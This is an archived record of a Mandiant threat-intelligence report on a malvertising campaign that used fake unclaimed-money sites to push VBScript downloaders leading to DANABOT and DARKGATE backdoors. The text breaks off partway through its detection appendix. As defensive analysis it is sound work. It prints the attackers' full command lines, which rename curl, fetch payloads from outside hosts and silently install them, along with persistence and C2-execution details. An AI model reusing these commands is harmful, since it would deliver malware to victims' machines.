{
	"id": "abd795b9-aecf-4ea6-a220-d1812af5678a",
	"created_at": "2026-04-06T00:10:11.193853Z",
	"updated_at": "2026-04-10T13:13:03.84905Z",
	"deleted_at": null,
	"sha1_hash": "d840fb5f1929247ffb5487c46d3026de97479ac8",
	"title": "Opening a Can of Whoop Ads: Detecting and Disrupting a Malvertising Campaign Distributing Backdoors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3278400,
	"plain_text": "Opening a Can of Whoop Ads: Detecting and Disrupting a Malvertising\r\nCampaign Distributing Backdoors\r\nBy Mandiant\r\nPublished: 2023-12-14 · Archived: 2026-04-05 16:11:12 UTC\r\nWritten by: Ryan Tomcik, Adrian McCabe, Rufus Brown, Geoff Ackerman\r\nEarlier this year, Mandiant’s Managed Defense threat hunting team identified an UNC2975 malicious advertising\r\n(“malvertising”) campaign presented to users in sponsored search engine results and social media posts, consistent with\r\nactivity reported in From DarkGate to DanaBot. This campaign dates back to at least June 19, 2023, and has abused search\r\nengine traffic and leveraged malicious advertisements to affect multiple organizations, which resulted in the delivery of the\r\nDANABOT and DARKGATE backdoors.\r\nManaged Defense worked with Advanced Practices and with the Google Anti-Malvertising team to remove the malicious\r\nadvertisements from the ads ecosystem, and subsequently alerted other impacted organizations to also take actions against\r\nthis campaign.\r\nThis blog post covers the details of recently discovered infrastructure operated by the distribution threat cluster UNC2975,\r\nwhich Mandiant has tracked since 2021, that leveraged malicious advertisements to trick users into visiting fake\r\n“unclaimed funds” themed websites. In this UNC2975 campaign, the malicious websites delivered PAPERDROP and\r\nPAPERTEAR downloader malware that eventually led to DANABOT and DARKGATE backdoor malware. This blog post\r\nalso highlights how Mandiant's findings result in takedowns of malicious ad campaigns served on Google infrastructure.\r\nUNC2975 Targeting and TTPs\r\nMandiant currently tracks around 30 threat clusters that use malicious advertisements for the delivery of malware,\r\nincluding backdoors, data stealers, and downloaders. 
Since at least 2021, a threat actor tracked as UNC2975 has leveraged\r\nthis technique to distribute downloader malware for second-stage payloads on victim endpoints.\r\nUNC2975 is a distribution threat cluster that has historically used malvertising in order to distribute the VBScript-based\r\ndownloader tracked as PAPERDROP. The distribution of PAPERDROP from UNC2975’s fake websites has primarily led\r\nto the deployment of the Delphi-based backdoor DANABOT. DANABOT is part of a Malware-as-a-Service platform\r\nwhere multiple affiliates can purchase access to the service. Beginning in September 2023, UNC2975’s malware\r\ndistribution shifted. Instead of DANABOT, UNC2975 deployed a Delphi-based backdoor tracked as part of the\r\nDARKGATE Malware-as-a-Service platform. Due to multiple affiliates using these service platforms, the distribution\r\nmethods of DANABOT and DARKGATE may vary across different distribution actors.\r\nUNC2975 creates fake websites that leverage themes such as unclaimed money, family ancestry, and astrology/horoscopes\r\nto facilitate its distribution operations. 
The threat cluster has commonly used social media advertisements to promote the\r\nfake websites but has since expanded to leverage additional platforms such as Microsoft and Google advertising.\r\nAds Backwards: A Google Malvertising Response Team Investigation\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 1 of 35\n\nUpon being notified of this campaign by Mandiant Managed Defense, the Google Anti-Malvertising team took\r\nenforcement actions and pivoted on the advertisement metadata to find additional related entries and to improve abuse\r\ndetection and classification systems.\r\nAdversaries use several sophisticated techniques including impersonating genuine businesses, cloaking (i.e., hiding\r\nmalicious web pages that only get revealed under specific conditions), and redirection to circumvent Google Ads\r\nverification and defense mechanisms.\r\nTo protect users, Google detects, prevents, and blocks abusive activity as detailed in our annual Ads Safety report. Google\r\nencourages users to report suspicious advertisements they come across through either My Ad Center reporting functionality\r\nor using this form.\r\nMalware Observed\r\nMandiant observed the following malware families while investigating this campaign.\r\nMalware\r\nFamily\r\nDescription\r\nPAPERDROP\r\nPAPERDROP is a downloader written in Visual Basic Script that communicates via HTTPS. It has\r\nbeen observed downloading DANABOT by writing it to disk and then executing it.\r\nPAPERTEAR\r\nPAPERTEAR is a downloader written in Visual Basic Script that communicates via HTTP.\r\nPAPERTEAR appends a list of enumerated local processes in the initial HTTP request.\r\nDANABOT\r\nDANABOT is a backdoor written in Delphi that communicates using a custom binary protocol over\r\nTCP. The backdoor implements a plug-in framework that allows it to add capabilities via\r\ndownloaded plugins. 
DANABOT's capabilities include full system control using a VNC or RDP\r\nplugin, video and screenshot capture, keylogging, arbitrary shell command execution, and file\r\ntransfer. DANABOT's proxy plugin allows it to redirect or manipulate network traffic associated\r\nwith targeted websites. This capability is often used to capture credentials or payment data.\r\nDANABOT can also extract stored credentials associated with web browsers and FTP clients.\r\nNumerous observed campaigns leveraging DANABOT have been reported, including UNC3379\r\nactivity associated with a coinminer campaign, and a similar mechanism for DANABOT distribution\r\nusing a different JS library.\r\nDARKGATE\r\nDARKGATE is a Delphi-based backdoor capable of performing keyboard capture, shell command\r\nexecution, file transfer and execution, and credential theft. Other functions include system survey,\r\nshutdown and restart, taking screengrabs and controlling a cryptominer. Some variants retrieve their\r\ncommand-and-control (C2 or C\u0026C) address from a page on the pastebin.com website.\r\nMore notable instances of OSINT reporting involving DARKGATE include actors previously\r\nassociated with QAKBOT leveraging DARKGATE as a payload, and some insights into\r\nDARKGATE’s technical architecture and use.\r\nTable 1: Malware families observed\r\nA Pain in the Ads: UNC2975 Campaign Discovery\r\nThreat actors purchase advertisements [MITRE ATT\u0026CK® Technique T1583.008] for malicious websites with the goal of\r\ntricking users into visiting and downloading malware [T1189], which can lead to data theft and ransomware. Platforms that\r\nserve advertisements, such as search engines or social media, can provide granular controls that allow advertisers to target\r\nspecific audiences based on users’ geographic locations, IP address range (e.g., geofencing), browsing history, and device\r\ntypes. 
Some of the more robust advertising platforms (such as Bing and Google Ads) provide even more targeting\r\ncategories, like age, gender, income level, and other audience attributes. These capabilities allow advertisers, both\r\nlegitimate and malicious, to craft ads specific to their desired targets and improve the effectiveness of their campaigns. This\r\nalso allows malicious advertisers who are able to avoid policy enforcement to develop and retain “customer” profiles about\r\nthe victims who interact with their ads for use in future targeting operations.\r\nEarlier this year, Managed Defense’s threat hunting team identified UNC2975 advertisements presented to users in\r\nsponsored search engine results and social media posts. The advertised websites were displayed in the sponsored results for\r\nsearches related to “unclaimed money” where individuals can search for and claim funds that are held by federal or state\r\ngovernment agencies [T1583.008].\r\nFigure 1: Search engine results advertising an UNC2975 controlled website\r\nWhen an unsuspecting victim clicked on a malicious advertised result, they were presented with a web portal that\r\nprompted them to enter their first and last name and their state of residence in order to receive a “report” on purported\r\nunclaimed funds.\r\nFigure 2: Screenshot of TreasuryDept[.]org on September 10, 2023, retrieved from Wayback Machine\r\nIn each investigation under this campaign, Mandiant identified browser history artifacts on affected systems showing that a\r\nuser clicked on a malicious advertisement and interacted with one of two websites: \r\nclaimprocessing[.]org or treasurydept[.]org.\r\nAdvertisement\r\nPlacement\r\nBrowser History Artifact(s)\r\nSocial Media Post\r\nMalicious 
URL:\r\nhttps[:]//www[.]claimprocessing[.]org/?utm_source=\r\n\u003csocialmedia\u003eads\u0026utm_medium=cpc\u0026utm_campaign=claim\u0026\u003csnip\u003e\r\nPage Title: \r\n“Find Mass Money - ClaimProcessing[.]org”\r\nVisit From: \r\nhttps://l.\u003csocialmedia\u003e[.]com/l.php?u=\u003csnip\u003e\r\nVisit Type: \r\nLink - Redirect\r\nSponsored Search\r\nEngine Result\r\nSearch URL:\r\nhttps://www[.]google[.]com/search?q=finding+unclaimed+money+in+california\u0026rlz=\r\n\u003csnip\u003e\r\nMalicious URL:\r\nhttps://www[.]treasurydept[.]org/?\r\nutm_source=googlesearch\u0026utm_medium=cpc\u0026utm_campaign=google\r\nPage Title: \r\n“Find Unclaimed Money - TreasuryDept[.]org”\r\nVisit From: \r\nhttps://www[.]googleadservices[.]com/pagead/aclk?sa=\u003csnip\u003e\r\nVisit Type: \r\nLink - Redirect\r\nTable 2: Browser history artifacts showing where the malicious advertisement was promoted\r\nThe downloadable “reports” were actually ZIP archive files containing Visual Basic scripts that Mandiant identified as\r\nvariants of the downloader malware families PAPERDROP and PAPERTEAR. The ZIP archive and Visual Basic script\r\nfilenames were based on the values the user submitted into the web form. Launching the Visual Basic script from an\r\narchive file generates a process execution event that launches the script from a temporary folder path [T1059.005]. 
The\r\ntemporary folder path that’s created is dependent on the archiving utility, such as WinRAR, that’s used to unpack the\r\narchive file.\r\nEvent\r\nEvent Details\r\nMalicious ZIP File\r\nDownload\r\nFile Write Process(es):\r\nC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\r\nC:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\nSample Download URL(s):\r\nhttps[:]//www[.]treasurydept[.]org/gujijed/tokew.php\r\nhttps[:]//www[.]claimprocessing[.]org/roxif/pateromyx.php\r\nSample Destination Path(s): \r\nC:\\Users\\\u003cuser\u003e\\Downloads\\flast_d45534i.zip\r\nC:\\Users\\\u003cuser\u003e\\Downloads\\msmith-dc45389tyt.zip\r\nPAPERDROP /\r\nPAPERTEAR\r\nExecution\r\nParent Process: \r\nC:\\Windows\\explorer.exe\r\nProcess:\r\nC:\\Windows\\System32\\wscript.exe\r\nSample Command Line:\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\1\\Temp1_flast_d45534i.zip\\flast_d45534i.vbs\"\r\nTable 3: Initial Visual Basic script payload download and execution\r\nMandiant identified three different delivery chains that PAPERDROP and PAPERTEAR used to download and execute\r\nsecondary payloads DANABOT and DARKGATE malware attributed to multiple UNC groups. 
Two delivery chains\r\nleveraged a renamed version of the cURL binary  curl.exe  [T1105] to download a malicious installation\r\npackage  .msi  file [T1218.007] or an AutoIt executable,  AutoIt3.exe  and malicious AutoIt script,  .au3  file [T1059].\r\nMandiant also observed PAPERDROP download and execute a malicious installation package file without using a specific\r\ntransfer tool.\r\nPayload Delivery\r\nChains\r\nEvent Details\r\nDelivery Chain #1:\r\nRenamed cURL\r\ndownloading Windows\r\nInstaller Package and\r\nexecuting with\r\nMsiexec.exe \r\nParent Process: \r\nC:\\Windows\\System32\\wscript.exe\r\nProcess:\r\nC:\\Windows\\System32\\cmd.exe\r\nCommand Line(s):\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd /d\r\nC:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy\r\nc:\\windows\\system32\\curl.exe KFSELqcUm.exe \u0026 KFSELqcUm.exe -o\r\nqgEYlIKPDYzj.msi https[:]//pittsburgh.soulcarelife[.]org/?\r\nsxykn3bjp0rmnaefzc8jb3qc2704 \u0026 C:\\Windows\\System32\\msiexec.exe /i\r\nqgEYlIKPDYzj.msi /qn\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd /d\r\nC:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy\r\nc:\\windows\\system32\\curl.exe ihcbzhY.exe \u0026 ihcbzhY.exe -o SYUxEbPz.msi\r\nhttps[:]//durham.soulcarelife[.]org/?n3sqd95xk20z2b3vue9tnpiadp2j6 \u0026\r\nC:\\Windows\\System32\\msiexec.exe /i SYUxEbPz.msi /qn\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd /d\r\nC:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy\r\nc:\\windows\\system32\\curl.exe NVJwQupTC.exe \u0026 NVJwQupTC.exe -o\r\nBEqvhTR.msi https[:]//plano.soulcarelife[.]org/?\r\nvc4njfp8xnwzb30akwaf2pj3fjs36q \u0026 C:\\Windows\\System32\\msiexec.exe /i\r\nBEqvhTR.msi /qn\r\nDelivery Chain #2:\r\nRenamed cURL\r\ndownloading AutoIT\r\nexecutable and script file\r\nParent Process: \r\nC:\\Windows\\System32\\wscript.exe\r\nProcess:\r\nC:\\Windows\\System32\\cmd.exe\r\nCommand 
Line(s):\r\n\"C:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\yifr \u0026 cd /d c:\\yifr \u0026 copy\r\nc:\\windows\\system32\\curl.exe yifr.exe \u0026 yifr -H \"User-Agent: curl\" -o\r\nAutoit3.exe http[:]//infocatalog[.]pics:8080 \u0026 yifr -o khscrk.au3\r\nhttp[:]//infocatalog[.]pics:8080/msiyifrmouv \u0026 Autoit3.exe khscrk.au3\r\nDelivery Chain #3:\r\nWindows Script Host\r\nprocess downloading\r\nWindows Installer\r\nPackage and executing\r\nwith Msiexec.exe\r\nParent Process: \r\nC:\\Windows\\System32\\wscript.exe\r\nProcess:\r\nC:\\Windows\\System32\\msiexec.exe\r\nCommand Line(s):\r\nmsiexec /i C:\\programData\\Y9U68YA55.bin /qn\r\nTable 4: PAPERDROP and PAPERTEAR delivery chains\r\nThe subsequent system artifacts that were created varied depending on the backdoor payload that was delivered. The post-delivery infection timelines shown in the following sections may not represent all potential artifacts, as complete malware\r\nexecution may have been disrupted by endpoint security software or network controls.\r\nInfection Chain #1: PAPERDROP \u003e DANABOT\r\nFigure 3: Infection chain #1 involving DANABOT\r\nIn the first infection chain following PAPERDROP execution, the Windows Script Host process  wscript.exe  performed\r\na DNS request for the domain  mesa.halibut[.]sbs  and connected to the IP address  47.252.45[.]173  over port  443 .\r\nThe process  wscript.exe  then executed the Windows Installer utility  msiexec.exe  [T1218.007] with the\r\ncommand  msiexec /i C:\\programData\\HLWOIRTAA9P.bin /qn  to quietly install an application using the package\r\nfile  C:\\programData\\HLWOIRTAA9P.bin  that masqueraded as a  .bin  file [T1036.008]. 
Next, the Msiexec application\r\nlaunched the installer process  C:\\Windows\\Installer\\MSI4F8C.tmp  which executed\r\nthe  rundll32.exe  command  C:\\WINDOWS\\system32\\rundll32.exe C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\Oadsoophotfp.dll,start  to load the in-memory dropper DLL file  C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\Oadsoophotfp.dll  and execute a function named  start  to decompress and deobfuscate a\r\nDANABOT payload [T1218.011]. The  rundll32.exe  process performed a series of writes to extensionless files under the\r\nuser’s  AppData\\Local\\Temp  directory.\r\nThe infected  rundll32.exe  process communicated with the IP address  35.203.111[.]228  over port  443  and the local\r\nIP address  127.0.0[.]1  over ports  22405  and  52787 . The DANABOT malware launched the\r\ncommand  \"C:\\WINDOWS\\system32\\rundll32.exe\" \"C:\\WINDOWS\\system32\\shell32.dll\",#61 22405  to open and interact\r\nwith the Run dialog that is  normally accessed through the Start Menu. Lastly, the infected  rundll32.exe  process\r\nexecuted the commands  schtasks /End /tn \\Microsoft\\Windows\\Wininet\\CacheTask  and  schtasks /Run /tn\r\n\\Microsoft\\Windows\\Wininet\\CacheTask  to stop and start the Wininet Cache Task [T1053.005]. 
This Scheduled Task\r\nactivity may be related to Wininet API hooking to intercept credentials entered into Microsoft Edge or Internet Explorer.\r\nFinally, the DANABOT-infected  rundll32.exe  process created and wrote to a randomly named  .tmp  file, such\r\nas  C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\tmpAEA8.tmp  or  C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Aroeihiaietwq.tmp .\r\nAlthough not observed in each case, Mandiant identified Run key persistence to execute the DANABOT payload in the\r\nfile  C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Oadsoophotfp.dll  using a random key value:  HKEY_USERS\\\r\n\u003cuser\u003e\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\\Hryrqsf  [T1547.001].\r\nInfection Chain #2: PAPERTEAR \u003e RENAMED CURL \u003e DARKGATE\r\nFigure 4: Infection chain #2 involving DARKGATE\r\nIn the second infection chain, the PAPERTEAR downloader performed an HTTP POST request to the\r\nhost  infocatalog[.]pics  over port  8080 . 
Next, the  wscript.exe  process executed the Windows Command Shell\r\nusing an extended one-liner consisting of multiple commands, shown in Figure 5.\r\nCommand Line:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\yifr \u0026 cd /d c:\\yifr \u0026 copy c:\\windows\\system32\\curl.exe yifr.exe \u0026 yifr -H \"U\r\nCommand Breakdown:\r\nmkdir c:\\yifr\r\nCreate the directory c:\\yifr\r\ncd /d c:\\yifr\r\nChange the working directory to the folder c:\\yifr\r\ncopy c:\\windows\\system32\\curl.exe yifr.exe\r\nCopy the cURL binary curl.exe to a new file named yifr.exe\r\nyifr -H \"User-Agent: curl\" -o Autoit3.exe http[:]//infocatalog[.]pics:8080\r\nUse the renamed cURL binary to download the file Autoit3.exe hosted on the domain infocatalog[.]pics\r\nyifr -o khscrk.au3 http[:]//infocatalog[.]pics:8080/msiyifrmouv\r\nUse the renamed cURL binary to download the file khscrk.au3 hosted on the domain infocatalog[.]pics\r\nAutoit3.exe khscrk.au3\r\nExecute the AutoIt script file khscrk.au3 using Autoit3.exe to install DARKGATE malware\r\nFigure 5: Breakdown of Windows Command Shell one-liner to drop DARKGATE\r\nInfection Chain #3: PAPERDROP \u003e RENAMED CURL \u003e DANABOT\r\nFigure 6: Infection chain #3 involving DANABOT\r\nIn the third infection chain, the PAPERDROP downloader executed another extended one-liner that used a\r\nrenamed  curl.exe  binary [T1105] to download and install a malicious package file that drops DANABOT [T1218.007]. 
\r\nCommand Line:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy c:\\windows\\system32\\curl.exe ihcbz\r\nCommand Breakdown:\r\ncd /d C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\\r\nChange the working directory to the folder C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\\r\ncopy c:\\windows\\system32\\curl.exe ihcbzhY.exe\r\nCopy the cURL binary curl.exe to a new file named ihcbzhY.exe\r\nihcbzhY.exe -o SYUxEbPz.msi https://durham.soulcarelife[.]org/?n3sqd95xk20z2b3vue9tnpiadp2j6\r\nUse the renamed cURL binary to download the file SYUxEbPz.msi hosted on the domain durham.soulcarelife[.]org\r\nC:\\Windows\\System32\\msiexec.exe /i SYUxEbPz.msi /qn\r\nInstall the malicious package file using Msiexec\r\nFigure 7: Breakdown of Windows Command Shell one-liner to drop DANABOT\r\nFollowing the execution of the  SYUxEbPz.msi  package installation, the  msiexec.exe  process created files to spoof the\r\nappearance of the Cisco Umbrella Roaming application under the directory  C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco\r\nCorp\\Umbrella Roaming Client\\Umbrella Roaming Client . One file in the new directory —  CoreReborn32.bin  — was\r\nidentified as a DANABOT launcher. In a separate investigation, Mandiant identified a folder path that spoofed the Box\r\nEdit application and dropped a DANABOT payload to the path  C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Box Inc\\Box Edit\\Box\r\nEdit\\Box.LocalComServer.Fix.Environment.dll .\r\nNext, the Windows Installer process  C:\\Windows\\Installer\\MSI23C9.tmp  launched the DANABOT backdoor with the\r\nRundll32 command  rundll32.exe \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella\r\nRoaming Client\\CoreReborn32.bin\",start  [T1218.011]. 
Once executed, the DANABOT-infected  rundll32.exe  process\r\nwrote to the Windows Run key  HKEY_USERS\\\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Srfshu  to ensure\r\npersistent execution of the command  \"C:\\WINDOWS\\system32\\RUNDLL32.EXE\" \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco\r\nCorp\\Umbrella Roaming Client\\Umbrella Roaming Client\\CoreReborn32.bin\",start  [T1547.001]. In addition to Run key\r\npersistence, Mandiant has also identified the capability for DANABOT to use a new Windows service [T1543.003] using\r\nthe  ServiceDll  entry to point to the malicious DLL.\r\nFigure 8: Infection chain #3 involving DANABOT\r\nSimilar to the first infection chain, the infected  rundll32.exe  performed a series of writes to extensionless files under the\r\nuser’s  AppData\\Local\\Temp  directory and communicated with the IP address  34.16.181[.]0  over port  443  and the\r\nlocal IP address  127.0.0[.]1  over port  15066 . The DANABOT malware launched the\r\ncommand  \"C:\\WINDOWS\\system32\\rundll32.exe\" \"C:\\WINDOWS\\system32\\shell32.dll\",#61 15066  to open and interact\r\nwith the Run dialog and executed the commands  schtasks /End /tn\r\n\\Microsoft\\Windows\\Wininet\\CacheTask  and  schtasks /Run /tn \\Microsoft\\Windows\\Wininet\\CacheTask  to stop and\r\nstart the Wininet Cache Task [T1053.005]. 
The DANABOT payload also modified the local proxy settings in the Windows\r\nregistry [T1562].\r\nFinally, the DANABOT-infected  rundll32.exe  process wrote to a randomly named  .tmp  file  C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\Prfpdh.tmp .\r\nWiseAds Comments: PAPERDROP and PAPERTEAR\r\nThroughout the course of the observed malvertising campaign, Mandiant encountered both PAPERDROP and\r\nPAPERTEAR Visual Basic Script (VBS) files in use by malicious actors to facilitate payload deployment.\r\nThe main difference in functionality between PAPERDROP and PAPERTEAR is that PAPERDROP makes heavier use of\r\nlocal files to facilitate payload deployment, whereas PAPERTEAR leverages direct command line execution.\r\nPAPERDROP\r\nInitially observed by Mandiant in January 2021 in use by UNC2975, PAPERDROP is primarily associated with\r\nDANABOT payload distribution and generally has several distinct characteristics across two different build types. NOTE:\r\nSince 2021, PAPERDROP has been observed in use by multiple UNC groups. The samples shown in this section represent\r\na cross-section of the PAPERDROP malware family as a whole, and are not specific to UNC2975 activity.\r\nThe first build type is markedly denser than the second. It features prominent use of code comments, complex variable\r\nnames, and other junk code presumably used as a rudimentary code obfuscation mechanism [T1027].\r\nFigure 9: PAPERDROP type #1, junk code and comments\r\nIn addition to the more commonly observed mechanism for code comments leveraging single quotes  ‘ , Visual Basic also\r\nallows the use of the characters “REM” to designate code comments. This can be seen in Figure 10. \r\nLooking through the smoke-screened code reveals some interesting elements. 
PAPERDROP seemingly leverages basic\r\nmathematical operations (especially modulus or “Mod”) as part of its execution flow.\r\nFigure 10: PAPERDROP type #1 source code, math functions\r\nIt also does little in the way of obfuscation with regard to concealing its C2 addresses or file system path names. It merely\r\nseparates these values through individual function calls to add characters to progressively concatenated strings, but it is\r\npossible to view the characters by simply scrolling through the file and reading them in reverse order from bottom to top\r\n(see Figure 11).\r\nFigure 11: PAPERDROP Type #1 source code, reverse-order string concatenation\r\nSome samples of PAPERDROP build type #1 feature elaborate Sleep calls, presumably in an attempt to evade sandbox\r\ndetection.\r\nFigure 12: PAPERDROP Type #1 source code, Sleep calls\r\nConversely, PAPERDROP build type #2 is much closer to PAPERTEAR in its architecture. It makes limited use of smoke-screened/obfuscated code in comparison to build type #1, though it still makes use of mathematical functions as part of its\r\nexecution flow.\r\nFigure 13: PAPERDROP type #2 raw source code\r\nWhen fully deobfuscated, the core download functionality executes as shown in Figure 14.\r\nFigure 14: PAPERDROP Type #2 deobfuscated source code, core payload retrieval\r\nIn the case of Figure 14, the file payload from  ignitethefund[.]com  was saved to  C:\\ProgramData\\1DR.png , though it\r\nwas executed by the PAPERDROP VBS as a DLL.\r\nPAPERTEAR\r\nSimilar to PAPERDROP build type #2, PAPERTEAR is also comparatively less dense. It too avoids excessive use of junk\r\ncode and stays fairly direct in terms of its execution flow. 
When executed on a host, most variants of PAPERTEAR try to\r\ncollect a list of running processes via Windows Management Instrumentation [T1047].\r\nFigure 15: PAPERTEAR source code, process retrieval\r\nPAPERTEAR will then initiate an attempt to retrieve its payload via an HTTP POST request to a remote C2 server via\r\na WinHTTPrequest object, and, for certain variants, appends the list of running processes it retrieves (code shown in Figure\r\n16) to the outbound HTTP request header. One of the minor obfuscation methods leveraged by PAPERTEAR samples is\r\nthe sporadic inclusion of curious code comments (Figure 16), presumably to avoid static-based detections and amplify\r\ncode entropy. In this case, however, identifying the literary source of the comments was…quite elementary.\r\nFigure 16: PAPERTEAR source code, HTTP functionality, code comments sourced from a Sherlock Holmes novel\r\nFrom there, PAPERTEAR will then parse the HTTP response from the C2 server and directly execute its contents on the\r\nhost via ShellExecute. With the limited obfuscation removed, the crucial snippet of code from Figure 16 that performs this\r\nfunction would otherwise appear as:\r\nCreateObect(\"Shell Application\").ShellExecute \"cmd\",\"\u003cvariable with http response from c2 containing arbitrary command\u003e\r\nThis is the core differentiator between PAPERTEAR and PAPERDROP. While PAPERTEAR executes commands directly\r\nfrom the HTTP response it receives, PAPERDROP writes the contents of the HTTP response to disk prior to executing\r\nadditional steps in its infection chain. 
PAPERTEAR is primarily associated with the distribution of DARKGATE payloads\r\nand is suspected to be integrated directly into the DARKGATE malware build process.\r\nCampaign Tracking \r\nMandiant has been disseminating intelligence on UNC2975’s campaign within Mandiant Advantage, providing our\r\ncustomers with notable and dynamic updates regarding changes in tactics and techniques, the introduction of tools with\r\nnew capabilities, and the use of new infrastructure UNC2975 has used to carry out its mission. \r\nMandiant tracks separate campaigns for each distribution method or actors delivering the Malware-as-a-Service backdoor\r\nDARKGATE. To differentiate between the initial malware distribution, DARKGATE infrastructure, and follow-on activity,\r\nMandiant tracks each part of the intrusion as separate clusters until further overlaps are identified and warrant merging.\r\nMandiant tracks the DARKGATE Malware-as-a-Service infrastructure and associated payloads as UNC5085 while\r\nseparately clustering the different distribution methods and any follow-on actors.\r\nSee our previous blog post for more insights into how Mandiant can help Gain Visibility Into Attacker Activity with Threat\r\nCampaigns. 
The following campaigns within Mandiant Advantage are associated with recent DARKGATE distribution\r\nactors and follow-on activity: \r\nCampaign\r\nNumber\r\nCampaign\r\nActors\r\nCAMP.23.045\r\nSuspected Financially Motivated Actor Phishing Employees via LinkedIn\r\nto Distribute DARKGATE Backdoor\r\nUNC4962\r\n(Distribution)\r\nUNC5085\r\n(DARKGATE)\r\nCAMP.23.046\r\nFinancially Motivated Threat Actor Using Social Media and SEO\r\nPoisoning to Compromise User with PAPERDROP and DANABOT\r\nUNC2975\r\n(Distribution)\r\nUNC5085\r\n(DARKGATE)\r\nCAMP.23.050\r\nFinancially Motivated Actor Distributing DARKGATE via Microsoft\r\nTeams\r\nUNC5051\r\n(Distribution)\r\nUNC5085\r\n(DARKGATE)\r\nCAMP.23.051\r\nDistribution Cluster UNC2500 Emerges After Hiatus to Distribute\r\nVarious Payloads Downloaded from Links in Phishing Emails\r\nUNC2500\r\n(Distribution)\r\nUNC5085\r\n(DARKGATE)\r\nCAMP.23.053\r\nFinancially Motivated Threat Actor Leveraging DARKGATE Access to\r\nDeploy BASTA Ransomware\r\nUNC2500\r\n(Distribution)\r\nUNC4393 (Follow-on)\r\nOutlook and Implications\r\nIn M-Trends 2023, the three most common initial access techniques Mandiant observed related to workstation compromise\r\nwere phishing [T1566], drive-by compromise [T1189], and replication through removable media [T1091]. Within the\r\ncategory of drive-by compromise, Mandiant has observed an increase from 2022 to 2023 in the number of investigations\r\ninvolving malicious advertisements where the initial infection vector was able to be identified. More broadly, in 2022\r\nalone, Google removed over 5.2 billion ads, restricted over 4.3 billion ads and suspended over 6.7 million advertiser\r\naccounts. 
While it is unlikely that malvertising will cease to be a viable attack vector for threat actors, maintaining a level\r\nof response readiness when such threats are identified is key to being able to neutralize campaigns in their early stages. In\r\nthis case, Mandiant Managed Defense, in partnership with Mandiant Intelligence and the Google Ads team, was\r\nsuccessfully able to protect users on a granular host-based level as well as at a global scale across the Google ecosystem.\r\nMandiant’s Managed Defense threat hunting team focuses on identifying behaviors associated with threat actors and\r\nendpoint compromises, especially those that don’t typically generate product-based alerts. By focusing on behavioral\r\nindicators, we can identify evidence of different types of compromise, such as malware execution or a threat actor profiling\r\nan environment using discovery commands. Like all security analysts, when we identify evidence of compromise, we\r\nanalyze the data to try to answer the question: “How was the system initially compromised?” Performing a deeper dive to\r\nidentify the initial infection vector and related timeline events provides two benefits: [1] the ability to identify campaigns\r\nthrough repeated use of infrastructure and indicators and [2] additional malware or behavioral artifacts that can be used to\r\ncreate or expand existing detections, event correlations, and threat hunting missions. 
The Detection Opportunities appendix below lists commands and artifacts that Mandiant discovered beyond the initial detection events; these were used to create additional signatures that identify future activity faster.\r\nAppendix A: Detection Opportunities\r\nSecurity analysts can use the following events as input for testing new or existing signatures for context-based detection or\r\nalerting.\r\n\r\nDetection Opportunity: Msiexec installing package with masquerading file extension\r\nMITRE ATT\u0026CK® Technique(s): T1218.007, T1036.008\r\nParent Process: C:\\Windows\\System32\\wscript.exe\r\nProcess: C:\\Windows\\System32\\msiexec.exe\r\nCommand Line: msiexec /i C:\\programData\\HLWOIRTAA9P.bin /qn\r\n\r\nDetection Opportunity: Rundll32 opening the Run dialog via shell32.dll\r\nMITRE ATT\u0026CK® Technique(s): T1218.011\r\nParent Process: C:\\Windows\\SysWOW64\\rundll32.exe\r\nProcess: C:\\Windows\\System32\\rundll32.exe\r\nCommand Line: \"C:\\WINDOWS\\system32\\rundll32.exe\" \"C:\\WINDOWS\\system32\\shell32.dll\",#61 22405\r\n\r\nDetection Opportunity: Anomalous Rundll32 file writes to %Temp% directory\r\nMITRE ATT\u0026CK® Technique(s): T1218.011\r\nProcess: C:\\Windows\\SysWOW64\\rundll32.exe\r\nFiles Written:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Sheddth\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Thshiqi\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Qswsweidoeuase\r\n\r\nDetection Opportunity: Windows Script Host executing file in compressed archive\r\nMITRE ATT\u0026CK® Technique(s): T1059.005, T1204.002\r\nProcess: C:\\Windows\\System32\\wscript.exe\r\nCommand Line: \"C:\\Windows\\System32\\WScript.exe\" 